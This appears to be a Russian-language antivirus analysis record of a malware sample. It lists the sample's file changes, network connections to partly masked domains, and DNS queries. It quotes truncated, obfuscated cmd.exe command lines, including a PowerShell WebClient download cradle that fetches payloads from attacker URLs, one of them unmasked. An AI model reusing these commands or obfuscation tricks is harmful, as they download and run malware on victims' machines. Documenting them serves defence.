Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set l6=o$ht4fW2w,_\BCikNO)1Glv@FX79(gZuVdzy0LAaD8x;jH+S-beR~rp%3\TEm':s5KM{UI6 .Pqc=}n&&for %C in (54,0,8,55,73,68,12,37,69,13,62,52,64,9,19,55,53,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\923.exe
Удаляет следующие файлы
- %TEMP%\923.exe
Сетевая активность
Подключается к
- 'gp####goas.com.br':80
- 'ro###ayak.ru':80
- 'ha#####rmizibeyaz.com':80
- 'ho####ecompany.vn':80
- 'ho####ecompany.vn':443
TCP
Другие
- 'ho####ecompany.vn':443
UDP
- DNS ASK gp####goas.com.br
- DNS ASK ro###ayak.ru
- DNS ASK ha#####rmizibeyaz.com
- DNS ASK ho####ecompany.vn
- DNS ASK dc####aldecor.lt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set l6=o$ht4fW2w,_\BCikNO)1Glv@FX79(gZuVdzy0LAaD8x;jH+S-beR~rp%3\TEm':s5KM{UI6 .Pqc=}n&&for %C in (54,0,8,55,73,68,12,37,69,13,62,52,64,9,19,55,53,...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set l6=o$ht4fW2w,_/BCikNO)1Glv@FX79(gZuVdzy0LAaD8x;jH+S-beR~rp%3\TEm':s5KM{UI6 .Pqc=}n&&for %C in (54,0,8,55,73,68,12,37,69,13,62,52,64,9,19,55,53,55,47,59,47,47,69,17,16,16,38,66,59,62,5...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $azvwd='nuwhvtd';$tijwjo=new-object Net.WebClient;$shczu='http://gp####goas.com.br/mZb9Ev99@http://rockmayak.ru/uDwCv6rHyzRXC@...
- '<SYSTEM32>\cmd.exe'
